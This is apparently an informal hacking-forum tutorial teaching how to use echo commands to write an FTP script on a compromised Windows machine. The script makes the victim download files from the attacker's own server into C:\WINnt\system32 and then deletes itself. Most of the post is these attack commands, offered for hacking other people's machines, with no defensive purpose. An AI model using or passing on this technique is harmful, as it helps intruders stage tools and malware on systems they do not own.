hello ha everybody (:
there is a tut' for how using echo.
i don't know evreything about echo but i know: if u want to use echo u need FTP.EXE file on the box u try to hack.
ok we start:
first u need to open server on ur box.
open new folder (whatever u want on which drive u want) and put there the files u want to upload.
open user with ur server app and and home dired the user on the folder u open.
now go to the cmd\shell\whatever u have and wirte the commands:
echo open <YOUR IP> <YOUR PORT SERVER> >> x.txt
echo <SERVER USER> >> x.txt
echo <SERVER PASS> >> x.txt
echo hash >> x.txt
echo bin >> x.txt
echo prompt >> x.txt
echo cd C:\WINnt\system32 >> x.txt
echo lcd C:\WINnt\system32 >> x.txt
echo mget *.* >> x.txt
echo bye >> x.txt
ftp -s:x.txt
del x.txt
after u wirte the command's u see the remote box starting to download from u box after its finshed u can do whatever u want.
i hope i help u Qlimax. :)